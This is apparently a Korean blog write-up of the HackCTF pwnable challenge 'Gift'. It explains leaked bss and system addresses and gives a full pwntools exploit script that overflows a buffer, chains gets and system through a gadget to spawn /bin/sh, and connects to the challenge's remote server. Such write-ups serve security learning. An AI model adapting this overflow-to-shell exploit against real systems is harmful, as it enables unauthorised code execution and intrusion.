-
[HackCTF : Pwnable] Gift(250p)Wargame/HackCTF 2021. 11. 26. 17:40
[HackCTF : Pwnable] Gift(250p)
gift checksec ㄷㄷ
주소 두 개를 뱉고 입력받은걸 출력해줌
main binsh과 system이다.
binsh /bin/sh 문자열은 아니고 bss영역이다. 여기다가 /bin/sh 써주면 됨
system은 system 주소다
gets로 bss에 /bin/sh 문자열 써주고 system(bss) 해주면 됩니다.
123456789101112131415161718192021222324252627282930from pwn import *# p = process("./gift")p=remote("ctf.j0n9hyun.xyz",3018)e = ELF("./gift")gets=e.plt['gets']pr=0x0804866bbinsh="/bin/sh\x00"p.recvuntil("Hey guyssssssssss here you are: ")bss = int(p.recv(10),16)system = int(p.recv(10),16)log.success(hex(bss))log.success(hex(system))payload = "A"*136payload += p32(gets)payload += p32(pr)payload += p32(bss)payload += p32(system)payload += "AAAA"payload += p32(bss)p.sendline("AAAA")p.sendline(payload)p.sendline(binsh)p.interactive()cs ex.py
'Wargame > HackCTF' 카테고리의 다른 글
[HackCTF : Pwnable] Look at me (250p) (0) 2021.12.27 [HackCTF : Pwnable] Beginner_Heap(250p) (0) 2021.12.24 [HackCTF : Pwnable] 1996 (200p) (0) 2021.11.25 [HackCTF : Pwnable] g++ pwn (200p) (2) 2021.11.15 [HackCTF : Pwnable] ROP (300p) (0) 2021.08.31
